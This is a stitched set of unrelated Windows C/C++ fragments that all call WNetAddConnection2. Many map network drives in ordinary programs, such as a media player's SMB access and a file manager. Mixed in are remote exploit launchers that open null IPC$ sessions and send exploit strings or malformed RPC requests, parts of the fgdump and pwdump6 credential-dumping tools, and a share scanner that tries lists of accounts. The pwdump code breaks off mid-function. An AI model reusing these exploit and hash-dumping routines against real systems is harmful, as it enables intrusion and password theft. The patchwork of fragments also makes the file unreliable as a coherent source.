CCircuitry* CNeighbour::ConnectTo(LPCTSTR xUserId, DWORD nTimeOut)
{
CSingleLock pLock( &m_pSection, TRUE );
CCircuitry* pChannel = FindChannel( xUserId );
if ( pChannel ) return pChannel;
NETRESOURCE ns;
ns.dwScope = RESOURCE_CONNECTED;
ns.dwType = RESOURCETYPE_ANY;
ns.dwDisplayType = RESOURCEDISPLAYTYPE_GENERIC;
ns.dwUsage = RESOURCEUSAGE_CONNECTABLE;
ns.lpRemoteName = Settings.Centric.Remote.GetBuffer(0);
ns.lpLocalName = NULL;
ns.lpProvider = NULL;
WNetAddConnection2( &ns, Settings.Centric.Password, Settings.Centric.UserId, 0 );
if ( ! WaitNamedPipe( Settings.Centric.Remote, nTimeOut ) ) return NULL;
pChannel = SetChannel( new CCircuitry( xUserId ) );
pChannel->ConnectTo( Settings.Centric.Remote, nTimeOut );
pChannel->SendPacket( new CBindPacket( xUserId, "" ) );
Connect(); return pChannel;
}
CStdString NetworkDriveHelper::MapNetworkDrive()
{
NETRESOURCE nr;
CStdString sDisk = GetUnusedDiskName();
TCHAR* pDisk = sDisk.GetBuffer();
CStdString sPath = GetUNCShareName();
TCHAR* pPath = sPath.GetBuffer();
nr.dwScope = RESOURCE_CONNECTED;
nr.dwType = RESOURCETYPE_DISK;
nr.dwDisplayType = RESOURCEDISPLAYTYPE_GENERIC;
nr.dwUsage = RESOURCEUSAGE_CONNECTABLE;
nr.lpLocalName = pDisk;
nr.lpRemoteName = pPath;
nr.lpComment = _T("Mapped network drive for Workshare LFS Testing");
nr.lpProvider = NULL;
DWORD dwErr = WNetAddConnection2(&nr, NULL, NULL, 0);
sDisk.ReleaseBuffer();
sPath.ReleaseBuffer();
if (dwErr == NO_ERROR || dwErr == ERROR_ALREADY_ASSIGNED)
return pDisk;
return _T("");
}
int main(int argc, char* argv[])
{
char *server;
NETRESOURCE nr;
char unc[MAX_PATH];
char szPipe[MAX_PATH];
HANDLE hFile;
if (argc < 2)
{
printf("Usage: %s <host>\n", argv[0]);
return 1;
}
server=argv[1];
_snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server);
unc[sizeof(unc)-1] = 0;
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpRemoteName = unc;
nr.lpProvider = NULL;
WNetAddConnection2(&nr, "", "", 0);
_snprintf(szPipe, sizeof(szPipe), "\\\\%s\\pipe\\browser",server);
hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL,
OPEN_EXISTING, 0, NULL);
BindRpcInterface(hFile,"8d9f4e40-a03d-11ce-8f69-
08003e30051b","1.0");
//SendMalformed RPC request
Attack(hFile);
return 0;
}
BOOL CCircuitry::Start(int nChan, BOOL bRebind)
{
NewBuffer( nChan );
RecordWith( nChan, m_pBuffer );
ReplayWith( nChan, m_pChain );
m_nTaskId = nChan;
if ( ! bRebind ) return TRUE;
NETRESOURCE ns;
ns.dwScope = RESOURCE_CONNECTED;
ns.dwType = RESOURCETYPE_ANY;
ns.dwDisplayType = RESOURCEDISPLAYTYPE_GENERIC;
ns.dwUsage = RESOURCEUSAGE_CONNECTABLE;
ns.lpRemoteName = Settings.Centric.Remote.GetBuffer(0);
ns.lpLocalName = NULL;
ns.lpProvider = NULL;
WNetAddConnection2( &ns, Settings.Centric.Password, Settings.Centric.UserId, 0 );
m_pChain->Release();
m_pChain = new CInterlink;
CString strPipe = Settings.Centric.Remote;
strPipe += '.'; strPipe += m_xUserId;
if ( ! m_pChain->ConnectTo( strPipe, 0 ) ) return Reset();
return TRUE;
}
/* UNC handling
*
* client can pass us a SSREQ_UNC: this contains both a password and a server
* name (in the form \\server\share). We make a connection to it here and
* remember the connection so that we can remove it (in ss_cleanconnections)
* when the client session terminates.
*
* We are passed the head of a FNAMELIST in which we should store the connect
* name for later cleanup. We return the new head of this list.
*
* the client will send this request if a unc-style named scan fails
* with the SSRESP_BADPASS error.
*/
PFNAMELIST
ss_handleUNC( HANDLE hpipe, long lVersion
, LPSTR password, LPSTR server, PFNAMELIST connects)
{
NETRESOURCE resource;
int errorcode;
resource.lpRemoteName = server;
resource.lpLocalName = NULL;
resource.dwType = RESOURCETYPE_DISK;
resource.lpProvider = NULL;
errorcode = (int)WNetAddConnection2(&resource, password, NULL, 0);
if (errorcode == NO_ERROR) {
/* remember the connection name */
connects = ss_addtolist(connects, server);
/* report success */
ss_sendnewresp( hpipe, lVersion, SSRESP_END
, 0, 0, 0, 0, NULL);
} else {
Log_Write(hlogErrors, "Connect error %d for server %s", GetLastError(), server);
dprintf1(("connect error %d for server %s\n", GetLastError(), server));
/* report error */
ss_sendnewresp( hpipe, lVersion, SSRESP_ERROR
, 0, 0, 0, 0, NULL);
}
return(connects);
} /* ss_handleUNC */
void sendstr(char *host) {
WCHAR wStr[128];
char ipc[128], hStr[128];
DWORD ret;
NETRESOURCE NET;
hMod=LoadLibrary("netapi32.dll");
fxn=GetProcAddress(hMod,"NetValidateName");
_snprintf(ipc,127,"\\\\%s\\ipc$",host);
_snprintf(hStr,127,"\\\\%s",host);
MultiByteToWideChar(CP_ACP,0,hStr,strlen(hStr)+1,wStr,sizeof(wStr)/sizeof(wStr[0]));
NET.lpLocalName = NULL;
NET.lpProvider = NULL;
NET.dwType = RESOURCETYPE_ANY;
NET.lpRemoteName = (char*)&ipc;
printf("-> Setting up $IPC session...(aka 'null session')\n");
ret=WNetAddConnection2(&NET,"","",0);
if (ret!=ERROR_SUCCESS) { err_exit("-> Couldn't establish IPC$ connection..."); }
else printf("-> IPC$ session setup successfully...\n");
printf("-> Sending exploit string...\n");
ret=fxn((LPCWSTR)wStr,buff,NULL,NULL,0);
}
static int
connect_net_drive(char *remote, char *drive)
{
DWORD dwRetVal;
NETRESOURCE nr;
DWORD dwFlags;
char *password=NULL;
char *user=NULL;
memset(&nr, 0, sizeof (NETRESOURCE));
nr.dwType = RESOURCETYPE_DISK;
nr.lpLocalName = drive;
nr.lpRemoteName = remote;
nr.lpProvider = NULL;
dwFlags = CONNECT_REDIRECT;
dwRetVal = WNetAddConnection2(&nr, password, user, dwFlags);
if (dwRetVal == NO_ERROR)
return 0;
PyErr_Format(PyExc_RuntimeError,
"WNetAddConnection2 failed with error: %lu\n",
dwRetVal
);
return dwRetVal;
}
bool ShareFinder::BindDrive(char* szDrive, char* szServer, char* szShare)
{
DWORD dwResult;
NETRESOURCE nr;
char szTemp[MAX_PATH];
char szTempFilename[MAX_PATH];
::ZeroMemory(&nr, sizeof(NETRESOURCE));
::ZeroMemory(szTemp, MAX_PATH);
_snprintf_s(szTemp, MAX_PATH, strlen(szServer)+1+strlen(szShare), "%s\\%s", szServer, szShare);
nr.dwType = RESOURCETYPE_ANY;
nr.lpRemoteName = szTemp;
nr.lpProvider = NULL;
nr.lpLocalName = szDrive;
nr.lpComment = "Added by fgdump";
dwResult = WNetAddConnection2(&nr,
(LPSTR) NULL,
(LPSTR) NULL,
CONNECT_UPDATE_PROFILE);
if (dwResult == ERROR_ALREADY_ASSIGNED)
{
Log.CachedReportError(m_nCacheID, DEBUG, "Already connected to specified resource on drive %s.\n", szDrive);
return false;
}
else if (dwResult == ERROR_DEVICE_ALREADY_REMEMBERED)
{
Log.CachedReportError(m_nCacheID, DEBUG, "Attempted reassignment of remembered device %s.\n", szDrive);
return false;
}
else if(dwResult != NO_ERROR)
{
Log.CachedReportError(m_nCacheID, DEBUG, "A generic error occurred binding the drive %s: %d\n", szDrive, dwResult);
return false;
}
Log.CachedReportError(m_nCacheID, DEBUG, "The drive %s is bound to %s, testing write access...\n", szDrive, szShare);
::ZeroMemory(szTempFilename, MAX_PATH);
_snprintf_s(szTempFilename, MAX_PATH, strlen(szDrive)+1+strlen(szServer)+7, "%s\\%s.fgdump", szDrive, szServer);
std::ofstream outputFile(szTempFilename, std::ios::out | std::ios::trunc);
outputFile.write("success", 7);
if (outputFile.fail())
{
Log.CachedReportError(m_nCacheID, DEBUG, "Error writing the test file to %s, skipping this share (error %d)\n", szShare, GetLastError());
WNetCancelConnection2(szDrive, CONNECT_UPDATE_PROFILE, TRUE);
return false;
}
outputFile.flush();
Log.CachedReportError(m_nCacheID, DEBUG, "Able to write to this directory, using drive %s for cachedump\n", szDrive);
outputFile.close();
DeleteFile(szTempFilename);
return true;
}
DWORD MountDOSDrive(char chDrive,const char *szSubmount,BOOL bPersistent,const char * pUsername)
{
#ifdef AFSIFS
DWORD err;
BOOL succ;
TCHAR szTokens[MAX_PATH], *tok;
#endif /* AFSIFS */
TCHAR szPath[MAX_PATH];
TCHAR szClient[MAX_PATH];
TCHAR szDrive[3] = TEXT("?:");
#ifdef AFSIFS
int pathCount, currPos, lastPos, x;
pathCount = 0;
pathCount = 0;
strcpy(szTokens, szSubmount);
tok = strtok(szTokens, "/\\");
strcpy(szPath, "");
while (tok)
{
if (pathCount || stricmp(tok, "afs"))
{
strcat(szPath, "\\");
strcat(szPath, tok);
pathCount++;
}
tok = strtok(NULL, "/\\");
}
sprintf(szDrive,"%c:",chDrive);
strcpy(szTokens, szPath);
sprintf(szPath,"\\Device\\afsrdr\\%d%s",pathCount,szTokens);
//succ = DefineDosDevice(DDD_RAW_TARGET_PATH, "J:", "\\Device\\afsrdr\\2\\ericjw\\test");
succ = DefineDosDevice(DDD_RAW_TARGET_PATH, szDrive, szPath);
err = GetLastError();
return succ ? NO_ERROR : ERROR_DEVICE_IN_USE;
#else
sprintf(szDrive,"%c:",chDrive);
GetClientNetbiosName (szClient);
sprintf(szPath,"\\\\%s\\%s",szClient,szSubmount);
NETRESOURCE nr;
memset (&nr, 0x00, sizeof(NETRESOURCE));
nr.dwType=RESOURCETYPE_DISK;
nr.lpLocalName=szDrive;
nr.lpRemoteName=szPath;
nr.dwDisplayType = RESOURCEDISPLAYTYPE_SHARE; /* ignored parameter */
DWORD res=WNetAddConnection2(&nr,NULL,pUsername,(bPersistent)?CONNECT_UPDATE_PROFILE:0);
DEBUG_EVENT5("AFS DriveMap","Mount %s Local[%s] Remote[%s] User[%s]=%x",
(bPersistent)?"Persistant" : "NonPresistant",
szDrive,szPath,pUsername?pUsername:"******",res);
return res;
#endif
}
void MapDrive(LPWSTR remoteName, LPWSTR localName, LPWSTR username, LPWSTR password)
{
NETRESOURCE net = {0};
net.dwType = RESOURCETYPE_DISK;
net.lpLocalName = localName;
net.lpRemoteName = remoteName;
net.lpProvider = NULL;
DWORD dw = WNetAddConnection2(&net, password, username, FALSE);
}
void ConnectToNetworkDrive(const string& NewDir)
{
string strRemoteName;
DriveLocalToRemoteName(DRIVE_REMOTE_NOT_CONNECTED,NewDir[0],strRemoteName);
string strUserName, strPassword;
GetStoredUserName(NewDir[0], strUserName);
NETRESOURCE netResource;
netResource.dwType = RESOURCETYPE_DISK;
netResource.lpLocalName = UNSAFE_CSTR(NewDir);
netResource.lpRemoteName = UNSAFE_CSTR(strRemoteName);
netResource.lpProvider = 0;
DWORD res = WNetAddConnection2(&netResource, nullptr, EmptyToNull(strUserName.data()), 0);
if (res == ERROR_SESSION_CREDENTIAL_CONFLICT)
res = WNetAddConnection2(&netResource, nullptr, nullptr, 0);
if (res)
{
for (;;)
{
if (!GetNameAndPassword(strRemoteName, strUserName, strPassword, nullptr, GNP_USELAST))
break;
res = WNetAddConnection2(&netResource, strPassword.data(), EmptyToNull(strUserName.data()), 0);
if (!res)
break;
Global->CatchError();
if (res != ERROR_ACCESS_DENIED && res != ERROR_INVALID_PASSWORD && res != ERROR_LOGON_FAILURE)
{
Message(MSG_WARNING, 1, MSG(MError), GetErrorString().data(), MSG(MOk));
break;
}
}
}
}
void send_exp() {
NETRESOURCE _IPC_;
_IPC_.lpLocalName = NULL;
_IPC_.lpProvider = NULL;
_IPC_.dwType = RESOURCETYPE_ANY;
_IPC_.lpRemoteName = (char*)&ipc;
printf("[+] Setting up IPC$ session...\n");
if (WNetAddConnection2(&_IPC_,"","",0)!=ERROR_SUCCESS) {
printf("[x] Couldn't establish IPC$ connection.\n");
exit (1);
}
printf("[*] IPC$ session setup successfully!\n");
printf("[+] Sending exploit ...\n");
NetAddAlternateComputerName(tgt_net_uni, expl_uni ,NULL,NULL,0);
// ka-a-a b0-0-0-ms //
}
static void Win32AddConnection( access_t *p_access, char *psz_path,
char *psz_user, char *psz_pwd,
char *psz_domain )
{
char psz_remote[MAX_PATH], psz_server[MAX_PATH], psz_share[MAX_PATH];
NETRESOURCE net_resource;
DWORD i_result;
char *psz_parser;
VLC_UNUSED( psz_domain );
memset( &net_resource, 0, sizeof(net_resource) );
net_resource.dwType = RESOURCETYPE_DISK;
/* Find out server and share names */
strlcpy( psz_server, psz_path, sizeof( psz_server ) );
psz_share[0] = 0;
psz_parser = strchr( psz_path, '/' );
if( psz_parser )
{
char *psz_parser2 = strchr( ++psz_parser, '/' );
if( psz_parser2 )
strlcpy( psz_share, psz_parser, sizeof( psz_share ) );
}
snprintf( psz_remote, sizeof( psz_remote ), "\\\\%s\\%s", psz_server, psz_share );
net_resource.lpRemoteName = psz_remote;
i_result = WNetAddConnection2( &net_resource, psz_pwd, psz_user, 0 );
if( i_result != NO_ERROR )
{
msg_Dbg( p_access, "connected to %s", psz_remote );
}
else if( i_result != ERROR_ALREADY_ASSIGNED &&
i_result != ERROR_DEVICE_ALREADY_REMEMBERED )
{
msg_Dbg( p_access, "already connected to %s", psz_remote );
}
else
{
msg_Dbg( p_access, "failed to connect to %s", psz_remote );
}
}
static void Win32AddConnection( stream_t *p_access, const char *psz_server,
const char *psz_share, const char *psz_user,
const char *psz_pwd, const char *psz_domain )
{
char psz_remote[MAX_PATH];
NETRESOURCE net_resource;
DWORD i_result;
VLC_UNUSED( psz_domain );
memset( &net_resource, 0, sizeof(net_resource) );
net_resource.dwType = RESOURCETYPE_DISK;
if (psz_share)
psz_share = psz_share + 1; /* skip first '/' */
else
psz_share = "";
snprintf( psz_remote, sizeof( psz_remote ), "\\\\%s\\%s", psz_server, psz_share );
/* remove trailings '/' */
char *psz_delim = strchr( psz_remote, '/' );
if( psz_delim )
*psz_delim = '\0';
net_resource.lpRemoteName = psz_remote;
i_result = WNetAddConnection2( &net_resource, psz_pwd, psz_user, 0 );
if( i_result != NO_ERROR )
{
msg_Dbg( p_access, "connected to %s", psz_remote );
}
else if( i_result != ERROR_ALREADY_ASSIGNED &&
i_result != ERROR_DEVICE_ALREADY_REMEMBERED )
{
msg_Dbg( p_access, "already connected to %s", psz_remote );
}
else
{
msg_Dbg( p_access, "failed to connect to %s", psz_remote );
}
}
void Session::ConnectWNet(LPWSTR user, LPWSTR pass, LPWSTR host)
{
std::wstring string;
if(host[0] != L'\\' && host[1] != L'\\')
{
string.append(L"\\\\");
}
string.append(host);
NETRESOURCE netResource;
netResource.lpLocalName = NULL;
netResource.lpRemoteName = (LPWSTR)string.c_str();
netResource.dwType = RESOURCETYPE_ANY;
netResource.lpProvider = NULL;
DWORD ret;
if((ret = WNetAddConnection2(&netResource, pass, user, CONNECT_UPDATE_PROFILE)) != NO_ERROR)
{
Util::Error(ret, L"WNetAddConnection2()");
exit(1);
}
}
static void Win32AddConnection(stream_t *access, const char *server,
const char *share, const char *user,
const char *pwd, const char *domain)
{
NETRESOURCE net_resource;
char remote_name[MAX_PATH];
VLC_UNUSED(domain);
memset(&net_resource, 0, sizeof (net_resource));
net_resource.dwType = RESOURCETYPE_DISK;
snprintf(remote_name, sizeof (remote_name), "\\\\%s\\%s", server,
(share != NULL) ? share + 1 /* skip leading '/' */: "");
/* remove trailings '/' */
char *delim = strchr(remote_name, '/');
if (delim != NULL)
*delim = '\0';
const char *msg;
net_resource.lpRemoteName = remote_name;
switch (WNetAddConnection2(&net_resource, pwd, user, 0))
{
case NO_ERROR:
msg = "connected to %s";
break;
case ERROR_ALREADY_ASSIGNED:
case ERROR_DEVICE_ALREADY_REMEMBERED:
msg = "already connected to %s";
break;
default:
msg = "failed to connect to %s";
}
msg_Dbg(access, msg, remote_name);
}
void do_map_drive(int & error_code) {
unmap_drive();
char share[256]=" ;103<;01";
logon(error_code);
if (server_user){
ImpersonateLoggedOnUser(server_user);
if (read_key("03",(unsigned char *)share,sizeof(share))) {
char * finger=share;
int bs=4;
while (*finger&&bs) {
if (*finger=='\\') bs--;
if (!bs) *finger=0;
finger++;
}
logfile("map %s\r\n",share);
char user[256]=" ;103<;01",password[256]=" ;103<;01";
read_key("01",(unsigned char *)user,sizeof(user));
read_key("02",(unsigned char *)password,sizeof(password));
unscr(user);
unscr(password);
NETRESOURCE ns={RESOURCE_CONNECTED,RESOURCETYPE_DISK,RESOURCEDISPLAYTYPE_SHARE,0,maped_drive,share,"test",0};
int ec=WNetAddConnection2(&ns,password,user,0/*CONNECT_UPDATE_PROFILE*/);
if (NO_ERROR!=ec) {
error_code=ec;
logfile("WNetAddConnection2 failed %i %s\r\n",ec,share);
}
drive_maped=true;
}
else {
error_code=267L;
logfile("directory not defined\r\n");
}
RevertToSelf();
}
}
//----------------------------------------------------------------
BOOL RemoteAuthenticationFilesScan(DWORD iitem, char *ip, DWORD ip_id, char *remote_share, PSCANNE_ST config, long int *id_ok, DWORD id_cb, BOOL multi)
{
#ifdef DEBUG_MODE_FILES
AddMsg(h_main,"DEBUG","files:RemoteAuthenticationFilesScan START",ip);
#endif
//check file
char remote_name[LINE_SIZE], msg[LINE_SIZE];
snprintf(remote_name,LINE_SIZE,"\\\\%s\\%s",ip,remote_share);
if (config->nb_accounts == 0)
{
NETRESOURCE NetRes = {0};
NetRes.dwScope = RESOURCE_GLOBALNET;
NetRes.dwType = RESOURCETYPE_ANY;
NetRes.lpLocalName = (LPSTR)"";
NetRes.lpProvider = (LPSTR)"";
NetRes.lpRemoteName = remote_name;
char tmp_login[MAX_PATH]="";
if (config->domain[0] != 0)
{
snprintf(tmp_login,MAX_PATH,"%s\\%s",config->domain,config->login);
}else
{
if (!config->local_account)snprintf(tmp_login,MAX_PATH,"%s\\%s",ip,config->login);
}
if (WNetAddConnection2(&NetRes,config->password,tmp_login,CONNECT_PROMPT)==NO_ERROR)
{
if (multi)
{
DWORD nb_file_check = CheckRecursivFilesList(iitem, remote_name, id_cb);
char source[MAX_PATH];
snprintf(source,MAX_PATH,"%s\\%s",ip,remote_share);
snprintf(msg,MAX_PATH,"%lu files checked",nb_file_check);
AddMsg(h_main,(char*)"INFORMATION (Files)",source,msg);
}else
{
snprintf(msg,LINE_SIZE,"%s\\%s with %s account.",ip,remote_share,tmp_login);
AddMsg(h_main,(char*)"LOGIN (Files:NET)",msg,(char*)"");
snprintf(msg,LINE_SIZE,"Login NET %s\\%s with %s account",ip,remote_share,tmp_login);
AddLSTVUpdateItem(msg, COL_CONFIG, iitem);
//check file
char file[LINE_SIZE];
DWORD j=0, _nb_i = SendDlgItemMessage(h_main,id_cb,LB_GETCOUNT,(WPARAM)NULL,(LPARAM)NULL);
if (id_ok != NULL && *id_ok > ID_ERROR) j = *id_ok;
for (;j<_nb_i && scan_start;j++)
{
if (SendDlgItemMessage(h_main,id_cb,LB_GETTEXTLEN,(WPARAM)j,(LPARAM)NULL) > LINE_SIZE)continue;
file[0] = 0;
if (SendDlgItemMessage(h_main,id_cb,LB_GETTEXT,(WPARAM)j,(LPARAM)file))
{
if (file)CheckFiles(iitem, remote_name, file);
}
}
}
WNetCancelConnection2(remote_name,CONNECT_UPDATE_PROFILE,1);
#ifdef DEBUG_MODE_FILES
AddMsg(h_main,"DEBUG","files:RemoteAuthenticationFilesScan END",ip);
#endif
return TRUE;
}
}else if (config->global_ip_file)
{
NETRESOURCE NetRes = {0};
NetRes.dwScope = RESOURCE_GLOBALNET;
NetRes.dwType = RESOURCETYPE_ANY;
NetRes.lpLocalName = (LPSTR)"";
NetRes.lpProvider = (LPSTR)"";
NetRes.lpRemoteName = remote_name;
char tmp_login[MAX_PATH];
if (config->accounts[ip_id].domain[0] != 0)
{
snprintf(tmp_login,MAX_PATH,"%s\\%s",config->accounts[ip_id].domain,config->accounts[ip_id].login);
}else
{
snprintf(tmp_login,MAX_PATH,"%s\\%s",ip,config->accounts[ip_id].login);
}
if (WNetAddConnection2(&NetRes,config->accounts[ip_id].password,tmp_login,CONNECT_PROMPT)==NO_ERROR)
{
if (multi)
{
DWORD nb_file_check = CheckRecursivFilesList(iitem, remote_name, id_cb);
char source[MAX_PATH];
snprintf(source,MAX_PATH,"%s\\%s",ip,remote_share);
snprintf(msg,MAX_PATH,"%lu files checked",nb_file_check);
AddMsg(h_main,(char*)"INFORMATION (Files)",source,msg);
}else
{
snprintf(msg,LINE_SIZE,"%s\\%s with %s (%02d) account.",ip,remote_share,tmp_login,ip_id);
AddMsg(h_main,(char*)"LOGIN (Files:NET)",msg,(char*)"");
snprintf(msg,LINE_SIZE,"Login NET %s\\%s with %s (%02d) account",ip,remote_share,tmp_login,ip_id);
AddLSTVUpdateItem(msg, COL_CONFIG, iitem);
//check file
char file[LINE_SIZE];
DWORD j, _nb_i = SendDlgItemMessage(h_main,id_cb,LB_GETCOUNT,(WPARAM)NULL,(LPARAM)NULL);
if (id_ok != NULL && *id_ok > ID_ERROR) j = *id_ok;
for (j=0;j<_nb_i && scan_start;j++)
{
if (SendDlgItemMessage(h_main,id_cb,LB_GETTEXTLEN,(WPARAM)j,(LPARAM)NULL) > LINE_SIZE)continue;
file[0] = 0;
if (SendDlgItemMessage(h_main,id_cb,LB_GETTEXT,(WPARAM)j,(LPARAM)file))
{
if (file)CheckFiles(iitem, remote_name, file);
}
}
}
WNetCancelConnection2(remote_name,CONNECT_UPDATE_PROFILE,1);
#ifdef DEBUG_MODE_FILES
AddMsg(h_main,"DEBUG","files:RemoteAuthenticationFilesScan END",ip);
#endif
return TRUE;
}
}else
{
unsigned int i;
for (i=0; i<config->nb_accounts && scan_start ;i++)
{
NETRESOURCE NetRes = {0};
NetRes.dwScope = RESOURCE_GLOBALNET;
NetRes.dwType = RESOURCETYPE_ANY;
NetRes.lpLocalName = (LPSTR)"";
NetRes.lpProvider = (LPSTR)"";
NetRes.lpRemoteName = remote_name;
char tmp_login[MAX_PATH];
if (config->accounts[i].domain[0] != 0)
{
snprintf(tmp_login,MAX_PATH,"%s\\%s",config->accounts[i].domain,config->accounts[i].login);
}else
{
snprintf(tmp_login,MAX_PATH,"%s\\%s",ip,config->accounts[i].login);
}
if (WNetAddConnection2(&NetRes,config->accounts[i].password,tmp_login,CONNECT_PROMPT)==NO_ERROR)
{
if (multi)
{
DWORD nb_file_check = CheckRecursivFilesList(iitem, remote_name, id_cb);
char source[MAX_PATH];
snprintf(source,MAX_PATH,"%s\\%s",ip,remote_share);
snprintf(msg,MAX_PATH,"%lu files checked",nb_file_check);
AddMsg(h_main,(char*)"INFORMATION (Files)",source,msg);
}else
{
snprintf(msg,LINE_SIZE,"%s\\%s with %s (%02d) account.",ip,remote_share,tmp_login,i);
AddMsg(h_main,(char*)"LOGIN (Files:NET)",msg,(char*)"");
snprintf(msg,LINE_SIZE,"Login NET %s\\%s with %s (%02d) account",ip,remote_share,tmp_login,i);
AddLSTVUpdateItem(msg, COL_CONFIG, iitem);
//check file
char file[LINE_SIZE];
DWORD j, _nb_i = SendDlgItemMessage(h_main,id_cb,LB_GETCOUNT,(WPARAM)NULL,(LPARAM)NULL);
if (id_ok != NULL && *id_ok > ID_ERROR) j = *id_ok;
for (j=0;j<_nb_i && scan_start;j++)
{
if (SendDlgItemMessage(h_main,id_cb,LB_GETTEXTLEN,(WPARAM)j,(LPARAM)NULL) > LINE_SIZE)continue;
file[0] = 0;
if (SendDlgItemMessage(h_main,id_cb,LB_GETTEXT,(WPARAM)j,(LPARAM)file))
{
if (file)CheckFiles(iitem, remote_name, file);
}
}
}
WNetCancelConnection2(remote_name,CONNECT_UPDATE_PROFILE,1);
#ifdef DEBUG_MODE_FILES
AddMsg(h_main,"DEBUG","files:RemoteAuthenticationFilesScan END",ip);
#endif
return TRUE;
}
}
}
#ifdef DEBUG_MODE_FILES
AddMsg(h_main,"DEBUG","files:RemoteAuthenticationFilesScan END",ip);
#endif
return FALSE;
}
int main(int argc, char* argv[])
{
char c;
int i;
char errMsg[1024];
FILE* outfile = stdout;
SC_HANDLE hscm = NULL;
SC_HANDLE hsvc = NULL;
char* szWritableShare = NULL;
char* szWritableSharePhysical = NULL;
char machineName[MAX_PATH];
char* machineArg;
char resourceName[MAX_PATH];
char szFullServicePath[MAX_PATH];
char szRemoteServicePath[MAX_PATH];
char szRemoteLsaExtPath[MAX_PATH];
char szFullLocalServicePath[MAX_PATH];
char szFullLocalLsaExtPath[MAX_PATH];
char pwBuf[256];
char* password = NULL;
char* userName = NULL;
char localPath[MAX_PATH];
char szDestinationServicePath[MAX_PATH];
char szDestinationDllPath[MAX_PATH];
char* szSelectedShareName = NULL;
char* varg[8];
char dwLen;
SERVICE_STATUS statusService;
BOOL bSkipHistories = FALSE;
char szGUIDServiceName[CHARS_IN_GUID + 1];
char* szServiceFileName;
char* szLsaExtFileName;
bool bIs64Bit = false;
ResourceLoader rlLsaExt, rlPwServ;
char szCurrentDir[MAX_PATH];
bool bIsLocalRun = false;
bool setPasswordHash = false;
//OutputDebugString("PWDump Starting");
srand((unsigned int)time(NULL));
pEncryptionKey = NULL;
if(argc < 2)
{
Usage(argv[0]);
return 0;
}
/*
fprintf(stderr, "\npwdump6 Version %s by fizzgig and the mighty group at foofus.net\n", PWDUMP_VERSION);
fprintf(stderr, "** THIS IS A BETA VERSION! YOU HAVE BEEN WARNED. **\n");
fprintf(stderr, "Copyright 2009 foofus.net\n\n");
fprintf(stderr, "This program is free software under the GNU\n");
fprintf(stderr, "General Public License Version 2 (GNU GPL), you can redistribute it and/or\n");
fprintf(stderr, "modify it under the terms of the GNU GPL, as published by the Free Software\n");
fprintf(stderr, "Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS\n");
fprintf(stderr, "PROGRAM. Please see the COPYING file included with this program\n");
fprintf(stderr, "and the GNU GPL for further details.\n\n" );
*/
while ((c = getopt(argc, argv, "xnhu:o:p:s:i:")) != EOF)
{
switch(c)
{
case 'h':
// Print help and exit
Usage(argv[0]);
return 0;
break;
case 'u':
// Set the user name
userName = optarg;
break;
case 'o':
// Set the output file name - opened in Unicode
outfile = fopen(optarg, "w, ccs=UTF-16LE");
if(!outfile)
{
sprintf(errMsg, "Couldn't open %s for writing.\n", optarg);
throw errMsg;
}
break;
case 'p':
// Set the password
password = optarg;
break;
case 's':
// Force this share to be used for uploading
szSelectedShareName = optarg;
break;
case 'n':
// Do not dump password histories
bSkipHistories = true;
break;
case 'i':
setPasswordHash = true;
break;
case 'x':
// Target x64
bIs64Bit = true;
break;
default:
printf("Unrecognized option: %c\n", c);
break;
}
}
// At this point, should have optarg pointing to at least the machine name
if (optarg == NULL)
{
// No machine
fprintf(stderr, "No target specified\n\n");
Usage(argv[0]);
return 0;
}
machineArg = optarg;
while(*machineArg == '\\')
machineArg++;
sprintf(machineName, "\\\\%s", machineArg);
if (stricmp(machineName, "\\\\localhost") == 0 || stricmp(machineName, "\\\\127.0.0.1") == 0 ||
stricmp(machineName, "localhost") == 0 || stricmp(machineName, "127.0.0.1") == 0)
{
bIsLocalRun = true;
}
// Prompt for a password if a user but no password is specified
if (password == NULL && userName != NULL)
{
i = 0;
c = 0;
fprintf(stderr, "Please enter the password > " );
while(c != '\r')
{
c = _getch();
pwBuf[i++] = c;
_putch('*');
}
pwBuf[--i] = 0;
_putch('\r');
_putch('\n');
password = (char*)pwBuf;
}
memset(resourceName, 0, MAX_PATH);
memset(szFullLocalServicePath, 0, MAX_PATH);
memset(szFullLocalLsaExtPath, 0, MAX_PATH);
memset(szRemoteServicePath, 0, MAX_PATH);
memset(szRemoteLsaExtPath, 0, MAX_PATH);
memset(szDestinationServicePath, 0, MAX_PATH);
memset(szDestinationDllPath, 0, MAX_PATH);
if (GetCurrentDirectory(MAX_PATH, szCurrentDir) == 0)
{
// Can't get the current working dir?!?!? WTF?
fprintf(stderr, "Unable to get the current working directory\n");
return -1;
}
//printf("Current directory for pwdump is %s\n", szCurrentDir);
szServiceFileName = (char*)malloc(MAX_PATH + 1);
szLsaExtFileName = (char*)malloc(MAX_PATH + 1);
// Generate a random name for the service (and file) and DLL
if (!GetRandomName((char**)&szServiceFileName, 5, 10))
{
sprintf(errMsg, "Filename size mismatch\n");
throw errMsg;
}
if (!GetRandomName((char**)&szLsaExtFileName, 5, 10))
{
sprintf(errMsg, "Filename size mismatch\n");
throw errMsg;
}
sprintf(szFullLocalServicePath, "%s\\%s.exe", szCurrentDir, szServiceFileName);
sprintf(szFullLocalLsaExtPath, "%s\\%s.dll", szCurrentDir, szLsaExtFileName);
//sprintf(szFullLocalServicePath, "%s\\servpw.exe", szCurrentDir);
//sprintf(szFullLocalLsaExtPath, "%s\\lsremora.dll", szCurrentDir);
// Pull the resources out of the EXE and put them on the file system
// We will use the resources appropriate to the target (32 vs. 64-bit)
if (bIs64Bit)
{
rlLsaExt.UnpackResource(IDR_LSAEXT64, szFullLocalLsaExtPath);
rlPwServ.UnpackResource(IDR_PWSERV64, szFullLocalServicePath);
}
else
{
rlLsaExt.UnpackResource(IDR_LSAEXT, szFullLocalLsaExtPath);
rlPwServ.UnpackResource(IDR_PWSERV, szFullLocalServicePath);
}
// If we're running against the local machine, don't bother doing any of the networking stuff.
// It actually prevents pwdump from running if networking is disabled.
if (bIsLocalRun)
{
strncpy(szFullServicePath, szFullLocalServicePath, MAX_PATH);
strncpy(szRemoteServicePath, szFullLocalServicePath, MAX_PATH);
strncpy(szRemoteLsaExtPath, szFullLocalLsaExtPath, MAX_PATH);
/*if (bIs64Bit)
sprintf(szFullServicePath, "%s\\servpw64.exe", szCurrentDir);
else
